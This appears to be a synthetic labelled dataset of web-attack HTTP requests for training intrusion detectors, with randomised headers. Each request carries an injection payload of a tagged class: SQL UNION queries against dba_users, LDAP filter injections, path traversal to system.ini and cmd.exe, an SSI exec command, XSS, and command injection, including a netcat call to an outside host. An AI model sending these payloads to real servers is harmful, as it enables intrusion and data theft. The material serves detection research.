Referer: http://8HehWh.gov/StOdmdu/javI/iesSek9/mnhlre.htm
TE: trailers,deflate;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.4 (compatible; MSIE 5.6; Mac OS X; Iaaye; rsgtloIN; detec6)
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: soni/1.0 www.lqtsEi.js, 8.0 249.102.209.83
Transfer-Encoding: compress
Upgrade: aeel/6.8, 8r7lst/5.1, dcuh/5.3, we7c9e/0.8
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47644
Start - Id: 43395
class: OsCommanding
GET /ttmatennGtar6femush/Q2Vg/Zadocument_dW/eioei1ttlIbImlaeow3/rMxUVrR.4FdqIq6ZmC/ny8VCTT/BLUH909P/.WixqXcopyimgenph-_D.png?munr=Il%28ge%3F4t%5B&ietiTeu=51007712&hof6sshe=eabyatothypuYhl1th&hidnadminD2TL=%2Fbin%2Fps%2500+%7C HTTP/1.1
Host: www.eotetesiai.cz:80
Connection: close
Accept: */*
Accept-Charset: cp-950;q=0.6, koi8;q=0.5, hz-gb-2312, shift_jis;q=0.4
Accept-Encoding: *
Accept-Language: 0sRcoem-d4srhfhe, 2tdnins-taqnedry;q=0.2, ru-omfass;q=0.6, b-ahavge
Cache-Control: only-if-cached
Client-ip: 143.76.65.70
Cookie: Blt=san:eeeif:oeoo;eentzaepc2=etifh
Cookie2: $Version="82"
Date: Sat, 19 May 07 18:13:36 UTC
ETag: W/"AMQ50BgW5OZswZc"
Expect: 100-continue
From: su7olsim@shSdnne.cz
If-Modified-Since: Wed, 22 Feb 06 21:34:39 CET
If-Unmodified-Since: Sun, 15 Nov 09 08:33:03 UTC
If-Match: "Oh1ADp1bMTGyrLlQF"
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic dXNTYmEwOmVlc2g2
Authorization: Digest nonce
Range: -4315,8885-439,063-
Referer: http://www.hqhk9yuo.be/rdtSnin/csnaswU/aam2mi/itae5S.php4
TE: trailers
Trailer: If-Range
User-Agent: ein0A/1.6.2.9
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: FTP/5.0 84.218.27.189
Transfer-Encoding: gzip
Upgrade: 37mj/0.5, lgeOa/4.4, ot2tcN/1.9, rat/6.0, EpB/9.2
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43395
Start - Id: 39115
class: LdapInjection
POST /st10WmzB/RduG.png? HTTP/1.0
Content-Length: 312
Content-Language: s34eoa8u
Content-Encoding: identity
Content-Location: /nRdi/loootx/Siot/tiitd/aiadsetk.txt
Content-MD5: NnNydHNleHJPdmhyOG5lbw==
Content-Type: application/x-www-form-urlencoded
Host: 62.121.33.248:7083
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.2, deflate;q=0.5, deflate;q=0.2
Accept-Language: *
Cache-Control: no-cache
Cookie: renwhgeCniTnc=er)(&(objectClass   =  tme*);77t4jedalNB=78868;Atki4eNgsx=20
Date: Fri, 24 Oct 08 04:56:23 CET
ETag: W/"gZFl0@Nu2rWw.db"
If-Modified-Since: Wed, 12 Nov 08 20:39:52 UTC
If-Match: *
Max-Forwards: 6
Pragma: no-cache
Authorization: Basic dG1uc286ZWNkbm9vYQ==
Referer: /Qsovtdew/caprc1we/iteeMtr/atf0esm/aIiauoml.sh
TE: trailers,deflate
User-Agent: Mozilla/4.7 (compatible; ntuaoei2yr; Win 9x; ilapie)
UA-Color: color16
Warning: 676 148.148.45.189 "3fhroMseset" "Wed, 28 Apr 04 09:47:59 GMT"

vuOtlCmttae=hXJw_q&trke7ush=vbk8aadmind5&dlaioee4Nd=eudtelnetn&n8tmarraaatt=e>hbtaea?ie@syoeropent&CM0connectCF=n9&.U1fsYT3cQ_2=-rpnetcattjnsIupdate&5ke9nop1n07iI=edRjllcpyAmnont&laittngaL=lY_YOU@PJ&mylle=f&Jbvl6update=Ht&tDeIskk=itmochaw&qAReQ1WD0Qs=44550&jo0qgnsd2nie=Eaoptc &pm&er=eitm&i4re=eX-VmxdG

End - Id: 39115
Start - Id: 45337
class: PathTransversal
GET /BmailXIEf-/if00w-CvmLXJ/uczqC/tlakaeeWe1LSo/VWgco@ydrop4nM2/Dio/l6.-@A4dpvsqS/p6as/nWnATschh4hrdyNJsvse/sRLIYIpf.asp?azqEfarer2noedn=an%5Cyqn+esock_streameenaed8s&NXizCgx=t&sSo=ute6dtrtzssixhu&A5l7tieoa=ef&ur=agoy4TwgetTGan%29ls&JosD=tnvns0heQ&nheNlhpsnyo1es=cenh%3CR%3Czjuniondpositionn&mtstan0IiIltaEn=315125674&SjeepIau=u6earhsEocee&edbzkteee6saY=J&z9ownttnhhn7i7=94064613&W2E14u-hHW1=f%24sn&nar=+%3B HTTP/1.0
Host: 6.72.241.27:88644
Connection: iymap
Accept: audio/*;q=0.4, text/*, audio/*;q=0.6
Accept-Charset: x-mac-arabic, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *;q=0.4
Cookie: i2ioo=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini;rnitpcu7tnR=xNj5sPZr
Date: Fri, 12 Aug 05 12:17:08 GMT
Expect: puen=ze0O2;Hohdr
If-Unmodified-Since: Sat, 27 Mar 10 23:39:18 GMT
If-Range: "IM4q9wN27F28Ij@x"
Proxy-Authorization: Basic Z3dFcmVicWo6aXRHM2FuZGM=
Referer: /desp.shtml
User-Agent: Mozilla/5.3 (compatible; MSIE 5.7; Win98; oatiepe; ntgtH; rnjbFo)

null

End - Id: 45337
Start - Id: 43640
class: OsCommanding
POST /wnyHa/eslHxSiYroadpenents/4b5r4Q/sk/e8L6zs/nutI-ADw53Lok9@bqU/39F/evCTnrhQ3O./YSnetcatbgsoundUeT/ii6LOYNQmfdB1goju.jpeg? HTTP/1.0
Content-Length: 195
Content-Language: l,apEuhie
Content-Encoding: deflate
Content-Location: http://orer.net/jNol/qtoottt/rIiLc7nI.jpg
Content-MD5: b25lbmVUbzFtdHJ5cXhzZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 May 08 08:02:55 GMT
Last-Modified: Sun, 20 Jun 04 20:10:31 UTC
Host: www.EptteOi.cz
Connection: bnno
Accept: audio/*;q=0.2
Accept-Charset: iso-8859-5, koi8;q=0.1, windows-1252
Accept-Encoding: 
Accept-Language: mfleent-hi0o, oteRr-heioqn, iddbil-oe9ueah;q=0.0, 7iieoee-eebeeru4;q=0.6, ym-ogeldm1;q=0.0
Cache-Control: no-store
Client-ip: 246.184.238.185
Cookie: saaeaodgToeahni=%0a   nc www.taenla.com 80  ;;elofqpelpQweh=79
Cookie2: $Version="84"
Date: Sun, 15 Feb 04 05:31:56 GMT
ETag: "Xa8gVi@udTES12zQZ"
Expect: orANeir
From: hseet@mdxc.uk
If-Modified-Since: Fri, 24 Jul 09 02:01:49 GMT
If-Unmodified-Since: Mon, 15 Sep 08 05:30:34 GMT
If-Match: "3Odcx7Wm.D9@SeMj-"
If-None-Match: *
If-Range: Fri, 15 Apr 05 19:10:39 CET
Max-Forwards: 582
MIME-Version: 0.3
Pragma: bnde='raoncwm'
Authorization: NTLM RXlkenlpbGk0MWlhSGphZmx3YWxmaWxvb2lzc2VoSWducmVydHRlbnB1MmU=
Range: -3449
Referer: /Ogzld/mimea.asp
TE: trailers
Trailer: If-Range
User-Agent: a4@xJFx http://www.8isasr.de
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 484x3782
Via: HTTP/2.9 255.66.102.27
Transfer-Encoding: gzip
X-Forwarded-For: 136.80.200.196
X-Serial-Number: 510031428573357
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

he=Eoa5Ipc2\9qobjectsystem&ndeDwTitr=5635&IC4qw=eZr00YMhIYvt&0cjXbFOBC=dittbh]'&eeTilh=64791360&tyts4=341488&r7a1ela=t5mh@i&f8=7024598332&UalRunionR9@l=x8TmmOnta2S<$1&iunhhocO=hG0YfRd

End - Id: 43640
Start - Id: 39252
class: SSI
GET /rB_E.JAJ0iq-lXUO0HZ/o_ZSP0D/eMX.Hw2lqQ_/syijehj/2t/lKvEEnQRghPAvw.gif?f2=+a&5hfotafoaratw6=dtp&thnti=2255645&ofc3=tecI&Mjl=gf%5C&aza=0t91bypositiontkrCohttpm&amtr=t%3A&Srd4tesaxai=77&eo=h&Tn=21819360&dsiLst9lL3l=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&anexerntoprtCm=1bnhsreO HTTP/1.0
Host: www.eco5.st:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-10646-ucs-2;q=0.7, windows-1250;q=0.2, windows-1254
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 213.207.160.227
Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="96"
Date: Wed, 11 Jul 07 21:05:16 CET
ETag: "I6x001IZy.Iz5lBYh"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 07 Jul 06 21:22:10 UTC
If-Unmodified-Since: Sun, 24 Jan 10 05:25:54 GMT
If-Match: "JxwGh.45.f9Swmwp"
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 607
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: oihrz enldoer=styei
Range: 5-9725,-6683
Referer: http://hieenh.com/e3hsh8mz/n5bo/Me9m/HAu4El.pl
TE: deflate,deflate;q=0.0,trailers
Trailer: If-Range
User-Agent: Mozilla/6.0 (X11; U; Unix 4.5; cu-6d; rv:6.9.7) Gecko/49964387
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 272x2054
Via: 2.1 180.85.21.169:6201, muS/6.2 81.171.164.216, 9.0 33.250.160.162
Transfer-Encoding: gzip
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39252
Start - Id: 42495
class: SqlInjection
GET /uqC6JG/i1ast6Oyt0MpXgnU/Yttaaondtt/0O@rsAu3D1iI4IHh3/EihstoOgnt1aP/upAfVtx7kLI4J/m0C_v2C.php?ceUnbn=%27+OR++%27lqolo%27++%3E++++%27S HTTP/1.0
Host: www.bsCtLd.ch
Connection: close
Accept: application/rtf, image/gif;q=0.0
Accept-Charset: cp-936;q=0.3, euc-tw
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.6
Cache-Control: min-fresh=8
Client-ip: 160.117.251.89
Cookie: ti5usa=e3$&5hrm;al=a06C;56CJMe0@0=nmw/7iurestdin;2n3dtqioyco=28181;ot=216
Cookie2: $Version="45"
Date: Sun, 20 Jul 08 05:50:21 CET
ETag: W/"zM.E2CNB3zjHZRVbibyv"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Sat, 13 Dec 08 22:31:16 UTC
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: "QnVZmaloNW8fUWoq"
If-None-Match: "WrRlEYwBtyEH_RMYX"
If-Range: Sun, 12 Jun 05 01:03:43 GMT
Max-Forwards: 13
MIME-Version: 9.9
Pragma: sstby6ci='57Ylbtvo'
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: utooek cAhe=prlkCm
Range: 7-59040
Referer: /tfep/ratiisEi/qgty.rar
TE: gzip;q=0.7,trailers
Trailer: Transfer-Encoding
User-Agent: 0lan/8.6.5.0.7
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: HTTP/2.0 www.zumt.gif, FTP/2.8 www.lenU4t9o.htm
Transfer-Encoding: beonz
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 210 56.86.237.225 "csttoifnOdeql" "Sat, 01 Mar 08 16:31:34 CET"
X-Forwarded-For: 25.37.30.27
X-Serial-Number: 029543372781579317
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42495
Start - Id: 42362
class: SqlInjection
GET /ateQE@Vt6SQ0p9x7A/e.8TyijyB.RVFheai/ecamei2tahLeot/y511QjM2UAp-Tf/lk4GTrnutrosehe/5ttd/kc/skelt3Psntprrt/Lbgsound/im7ehdai1Ztzlisr/tA8Jmsw5mgEMO6SG34/whereRD4t5Zxinclude63S.php?objectuRy7V=oi&6imbCboro0t=ddptos4zl3i&ss1Elt=chairs%27++++UNION++SELECT++Oa5rezhhox+FROM+++++dba_users+WHERE++name+like+%27%2525 HTTP/1.0
Host: www.shet.it
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2, x-mac-ce, euc-tw;q=0.0, isiri-3342
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=41223
Client-ip: 254.246.251.197
Cookie: meytstvx=locationsrincludeselect-=open6lwindow.opener;aoy3ststar=41;snlOblAhsNG6=dlikesock_streamex;pwc2ctCdEewr=IeHomzy
Cookie2: $Version="89"
Date: Wed, 06 Oct 04 17:51:09 GMT
ETag: ".pHQcBCpLNiI3Vv"
Expect: 100-continue
From: 7Wathoi0@p7np.ch
If-Modified-Since: Sat, 05 Mar 05 23:08:48 UTC
If-Unmodified-Since: Wed, 24 Aug 05 02:43:40 UTC
If-Match: "M7pkfZZsLwwI2CUrYz"
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: "J1jbAnYAkRDfR6Jb71fO"
Max-Forwards: 60
MIME-Version: 2.3
Pragma: 0crr='iEivoT'
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: NTLM ZWRwZWhhc2Fhbm51aXdxRWVvZWloZXRhZUpxYWVlbnJl
Range: -966,396-333,-3990
Referer: http://www.hsiu1lig.gov/rsa8bfi/exmil/s13eeuc/hfrtraOi/dgd52.cgi
TE: chunked;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.1 (compatible; jEaTk; SunOS sun4u; rsihctsi)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1680x018
Via: 3.7 252.43.16.106, HTTP/1.2 www.iteesn.js, 5.8 www.i2srntet.gif
Transfer-Encoding: roer; nj9r=eVstiEl
Upgrade: ioA/2.2, sl6sg/1.0
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 173.232.8.193
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42362
Start - Id: 40253
class: SSI
PUT /ynrhRnetstSloro/yysh0rcM9xkDtzp2Zle/nMUvuX7W/61xrnottno/e2aeIgg/ofh@W-DhX/6Jlnl74fJZYO/ru9esoiorE2eh7aenSo/r3y7zY_@_JEs_/n1YyDrUENVj5/nuE.Cv/eb7hedeeEelt.pl? HTTP/1.0
Content-Length: 359
Content-Language: yo1l,emttreph
Content-Encoding: deflate
Content-Location: http://ivoto.org/voeoitw.jpeg
Content-MD5: bGpkaWhBZXN0ZHJkYWxOZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Feb 09 01:42:18 CET
Last-Modified: Tue, 12 Sep 06 05:55:56 UTC
Host: www.hskr5t.cz
Connection: close
Accept: image/png, video/quicktime, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=02006
Client-ip: 171.88.48.143
Cookie: hslitqhy=422399;ooheln8Ft19k3tG=119;nimanrorU9=q7ythulmeideiihn;euicwsl=NO;3cro7xraHim=le ta1TeB;83LLSZD-=18086
Cookie2: $Version="7"
Date: Wed, 05 Dec 07 18:07:05 GMT
ETag: "QQY_.zvrgninbUH8uvt"
Expect: 4tksenn1=dexsrl4s;caevs=w60etc
From: YHtcdN@wRae.uk
If-Modified-Since: Sun, 05 Mar 06 15:05:38 UTC
If-Unmodified-Since: Thu, 24 Mar 05 01:21:12 GMT
If-Match: *
If-None-Match: "LEA3A4zo@qHNPkGBl"
If-Range: *
Max-Forwards: 31
Pragma: ets='jawr'
Proxy-Authorization: Basic b3FoYW56ems6OTdpbG8=
Authorization: NTLM MnJtUzd5ZUlpYnVrMGRjYW1hc1JvT2VlZXBvb25tdGlpZHJhdA==
Range: 7-1281,22479-
Referer: /amyc/Moevhro/gMeeeho/er1p/a7en2.asmx
TE: trailers,chunked
User-Agent: Mozilla/0.6 (Machintosh; U; PPC Mac OS X 0.7; ln-yB; rv:3.2.7) Gecko/45551505
UA-Disp: 3250,7812,32
Via: FTP/1.3 www.ceos.tiff:440
Transfer-Encoding: gzip
Warning: 524 216.140.150.200 "ytojircesetlOqieus" 
----: --------------------

tiieeebgsopi=954937&wsEhgTooTdjAv=ule7uijotob7&ByoREstdini2Lpassthru=039989&@BxJwOmetaWTwx=<!-- #exec    cmd="c:\progra~1\Htih\epsubtto\krri8s5M.exe     d:\nHnpee\www.taolla.org\sOaenSosrm\database.mdb   /x  exporttofoxpro"-->&ctw= iu ornwe&nlDUmtr=9326133&eoHrIa16sGlsw=edaorlscdo8syaed4e&Ain=1&laa=4&r3njd=885&5Q9h=7598

End - Id: 40253
Start - Id: 49970
class: XPathInjection
GET /2aratrnfrgnpnAmro/8M/Obinekm.html?kde5t=ddnamiT&tr0ehlz=hg+oeeaDb&nnbr7danc4ilih=8638&ofreo6swhmr=nmoaHsBegtl2sr&Oo1sfaneuvd=eieipce%5Dns%5Ce&Xuqimgivarmocha59XG=3794&FOdiv1y_idoHM=%28i++%3C+++++count%28ia%2Fchild%3A%3Atext%28%29%29+++++and+++j+%3C++++count%28tha%2Fchild%3A%3Acomment%28%29%29++++and+++k+++%3C+count%28seah%2Fchild%3A%3A*%29+++++%29&feesrdxytif=36207911&mPSMf=46175936 HTTP/1.0
Host: www.rhTjw.be
Connection: pdtsNzse
Accept: */*
Accept-Charset: x-mac-japanese, x-mac-icelandic;q=0.2, x-mac-arabic;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: dYFah-tacLe8;q=0.3, uolsal-tvj, oaAs-i8
Cache-Control: no-store
Client-ip: 164.99.223.41
Date: Sat, 29 Dec 07 09:33:54 GMT
ETag: W/"WSy3s1khQ_tRVv5FBi"
Expect: ahthray
If-Modified-Since: Wed, 11 Jul 07 04:45:53 UTC
If-Unmodified-Since: Fri, 24 Apr 09 12:47:52 CET
If-Match: "O-qMEhe5FYWPFs_0Wl"
If-Range: Sat, 18 Feb 06 24:25:48 GMT
Max-Forwards: 452
MIME-Version: 0.0
Pragma: no-cache
Authorization: Digest response="fd530FB1f4d6e6B5795Acf09EE08cC4F"
Referer: http://aahdemyi.uk/5mp9pe9/keauiym/su3nh/AaoZjte/07stln2s.bin
TE: trailers,deflate;q=0.3,chunked
Trailer: Accept-Encoding
User-Agent: srS8ey http://www.yt8w.it
UA-OS: Linux
Via: vessnp/1.6 www.bshea3a.tiff, HTTP/8.6 142.110.216.93, 3.1 www.nmwEef.png
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49970
Start - Id: 36952
class: LdapInjection
PUT /cBB9DJOW-9WAnAHV@jAq/loPFx7_C@NN/tO@eF/nI/LCcMrV5txtermIH6/nH6n@1V4zK/evalmE.objectFz/GQZBJGVShome7o8fD.tiff? HTTP/1.1
Content-Length: 194
Content-Language: d,vaPnN
Content-Encoding: compress
Content-MD5: bWlpZXppVGJzcW5saDZtbw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 04 May 09 11:40:03 GMT
Host: www.6s4o.cz:179
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2;q=0.2, x-mac-arabic;q=0.6, x-mac-chinesetrad, iso-8859-2;q=0.9, iso-10646-ucs-2
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.8
Cache-Control: max-age=93
Client-ip: 34.164.109.13
Cookie: dilMflka0culWk=5844663
Cookie2: $Version="5"
Date: Fri, 11 Dec 09 10:18:34 CET
If-Match: "zwtkQNFqX@6-lHBGjYiV"
If-None-Match: *
MIME-Version: 6.6
Authorization: NTLM b3RuY1NDbmFFVGVFSHVhbjZlcmVmNmhuN29jZWV6bWljbmVybWNsbUVoZWxoOQ==
Range: -69,-806
Referer: /ttmstv/eaHi.mdb
User-Agent: Mozilla/6.3 (compatible; MSIE 4.7; Open BSD i586; n37aa; 5h7sd9gst; y2ZTeolt)
UA-OS: Win98
UA-Color: color32
Via: 4.6 www.owac.shtml, HTTP/1.1 www.e0ote.htm
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iu=88&oacrtddwoeh=itOgOdcoq&9dk=knktydaTo&3R=62724&3muuhavingxa2vexece8=)   (  |   (displayName=had*)    (name =   had*  )(mail=had*   )&9krQBrTlike7.=436&gdls7mhx=|dea

End - Id: 36952
Start - Id: 38999
class: LdapInjection
GET /mjrpvnI/dkhOOj/n625YnG1S6TJIh/afhyhbmxerxitac7tF/eMx/8K9WphpV8M/emp/pifrmtochod8es/1aFcoisleijn/hwG5eLIzV3BxgF/sieebt/tEgudn.dll?r1n=75300653&xn=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&nwnkoetEu=niyeaie&owtazEsepZdcrn=234&u8an=7&teaistxrrogr5av=a6KTRg3f1&x4Mboot.iniK3sYN=n%3C+e&e7twuhe=338&iRak1nhes=e0d%26&7hlnsqelleov=9195927&tim2sEdt0t=tena&lltsPeoiaNw=%5Chvtvnqelea&roEtypT=5 HTTP/1.1
Host: 171.216.75.215:80
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: x-mac-korean;q=0.8, iso-8859-9;q=0.7, x-mac-roman
Accept-Encoding: deflate
Accept-Language: 06oqeect-h, eenenaD-lossmEU;q=0.6, paasnqc-uhusf;q=0.4, gsasx-u;q=0.4, b9u-t;q=0.2
Cache-Control: no-cache
Client-ip: 176.94.177.249
Date: Thu, 22 Mar 07 01:08:50 GMT
If-None-Match: *
If-Range: Sat, 25 Jun 05 23:25:16 GMT
Proxy-Authorization: Digest username="gsmPaTgi"
Referer: /b3RoL/ousIbdto/d6mnae.gif
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 5.2; io-9c; rv:8.7.7) Gecko/25056678
UA-Pixels: 1354x587
Via: 4.9 www.r8lrjc.gif, HTTP/5.4 206.159.138.65:16098
Transfer-Encoding: identity
Upgrade: S0ef/5.7, ase/3.7, ikinn/9.6
X-Forwarded-For: 102.196.215.46

null

End - Id: 38999
Start - Id: 45804
class: PathTransversal
GET /aiDegd/5oz/kigrlwm3wreh/iP/dreshehthy7dmei/DHEHjB/fatscmylS6egkhyope0k/uBPg5o5hgj-s0/susAgdOeNh.tiff?zedtgc2tii5=aqtii0P&ensfrrancsa=t%29&nvsHdwo6g=syr2D8Hyi-d&x8Hove=84835193&rle=fCHbc&cbil3o=hhj&flu3e=5&-kdDH=htpassyGncib1%7EeR&ssMaratserhlonA=%5Cautoexec.bat&haweteei4hayr=6Ebp&adztcbsemcesrd=Wh HTTP/1.0
Host: www.i5ss6teou.org
Connection: reoio
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: max-age=80541
Client-ip: 89.136.143.100
Cookie: unet=:h&[yeaas;ino0loieeiT4t6n=a4n9oyOfnmeaEtorii;eafie=tmp;fplhTErr=eE@j182F5;AjrieteLohjodt=S|i;noftawtv0Al=0511
Cookie2: $Version="085"
Date: Sat, 18 Aug 07 10:22:41 CET
ETag: "RXzBxEUPj84ka@n1rH"
Expect: 100-continue
From: mzkc3t@iIdwe.ch
If-Modified-Since: Tue, 22 Nov 05 12:29:35 CET
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: "lN4y2yoNZjxbveeM5G"
If-None-Match: *
If-Range: "hPhGPAnji39a7lo8"
Max-Forwards: 00
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Digest qop=bEneli
Range: 151606-
Referer: /tnet.doc
TE: trailers,chunked,chunked
Trailer: Accept-Language
User-Agent: Mozilla/3.8 (compatible; MSIE 3.9; Unix; ichap39on)
UA-CPU: x86
UA-Disp: 1489,7899,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9422x259
Via: 3.7 25.113.168.162, FTP/7.2 148.228.246.44
Transfer-Encoding: tiOrc
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 157.18.224.28
X-Serial-Number: 97437776345
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45804
Start - Id: 47745
class: XSS
GET /Jrcbtgs/l5tonrkhilHnretf/8iqeeTagiCrt4rt.gif?nbletjsDqrnhw=%3Cdiv++++style++%3D+++%22+binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.ns.com%2Fscript%2F24.dll%5D%29%3B+++%22+++%3E HTTP/1.1
Host: www.ENtethuch.net:948
Connection: qmsc7iia
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 58.135.32.75
Cookie: RCoptNuR=n4q_w-jT8;XmnzN1N.netcatPG=iTELdt1LeK
Cookie2: $Version="00"
Date: Thu, 07 Oct 04 10:43:23 CET
ETag: "7talGQPBsmJ_AaAgn"
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Sun, 25 Jan 04 18:37:01 UTC
If-Unmodified-Since: Wed, 18 Nov 09 23:33:03 UTC
If-Match: *
If-None-Match: "Bz@Od3DC@@cOUbNqW"
If-Range: ".QYT6A-MEQgvso.i_IjW"
Max-Forwards: 9
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic czZVbmRodDphdW5zdG9u
Authorization: 6lRTvt et6rdy=hgrgone
Range: -887125,6715-3229
Referer: http://jp0yse.st/Eaecm/tiosera/Ioyangaa/ieihiwn.tiff
TE: trailers,gzip,trailers
Trailer: Date
User-Agent: Mozilla/7.6 (compatible; MSIE 9.8; Win98; shrs; rtgKEiSS)
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0710x100
Via: re7he/5.9 www.enoCin.jpg:3
Transfer-Encoding: deflate
Upgrade: sji/4.0, asq/5.9, arzh/5.3
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 198.120.124.208
X-Serial-Number: 75850540029155
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47745
Start - Id: 44078
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 191.142.109.43
Connection: 5hetOj9r
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ge-i, tts-eoh8
Cache-Control: only-if-cached
Client-ip: 118.75.169.199
Cookie: fZvkdNKW=dropbeet58ogecm0;Ustns85tehNNons=a6O.P_e;lceosrlqtoe5=a3autwwlIa7eb;aoi8n=568;ateeirth=LuDcibferZ0ce
Cookie2: $Version="91"
Date: Sun, 13 Jan 08 24:06:59 GMT
ETag: W/".Z.c4.xeA3kSTWv"
Expect: ohQd=nebl
From: eyde@enOee.biz
If-Modified-Since: Tue, 12 Jul 05 23:33:17 CET
If-Unmodified-Since: Sat, 07 Feb 04 23:08:12 UTC
If-Match: "4izoy@O-uWLf6iB"
If-None-Match: "MDPo74HHIQKQy_hE7"
If-Range: "Bgk78tIdC6rpnZuB2R"
Max-Forwards: 5390
MIME-Version: 3.4
Pragma: ufnoe7='vaargm'
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: Digest realm
Range: 70-
Referer: /icullEl/deeetcs/ii2hoC/rodqn/uaaoeetb.pdf
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: r4ce/8.0.6.2.6
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4959x090
Via: 6.7 www.3x5m.html, peh/8.6 www.ytrtsbGZ.js, HTTP/3.6 30.37.47.72
Transfer-Encoding: teYne; nFrmtoRh=cananjo7
Upgrade: unHis2/9.7, sDw/8.7
Warning: 247 www.hxe31.png "9a02iegsdsel8esiecoC" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: -------------
